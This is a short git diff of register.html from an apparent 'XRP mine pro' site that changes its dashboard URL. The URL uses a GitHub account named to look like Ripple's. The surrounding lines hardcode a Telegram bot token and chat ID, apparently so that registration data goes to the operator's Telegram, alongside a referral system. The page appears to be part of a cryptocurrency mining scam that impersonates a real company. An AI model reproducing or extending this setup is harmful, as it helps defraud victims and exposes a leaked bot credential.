--- a/register.html
+++ b/register.html
@@ -227,8 +227,8 @@
         // =========================================================================================
         const TELEGRAM_BOT_TOKEN = "8441096313:AAGtOgFrHFk3ROaRKZoYQ19prswgRvqkU1Y"; 
         const TELEGRAM_CHAT_ID   = "8344580966"; 
-        // ⚠️ ඔබගේ සැබෑ වෙබ් අඩවියේ URL එක යොදන්න (උදා: https://xrp-mine-pro/dashboard.html)
-        const DASHBOARD_URL = 'https://ripple-com.github.io/xrp-mine-pro/dashboard.html'; 
+        // ⚠️ ඔබගේ සැබෑ වෙබ් අඩවියේ URL එක යොදන්න (උදා: https://xrp-mine-pro.github.io/dashboard.html)
+        const DASHBOARD_URL = 'https://github.com/ripple-com/xrp-mine-pro/blob/main/dashboard.html'; 
         // =========================================================================================
         
         // ⚡️ REFERRAL SYSTEM 
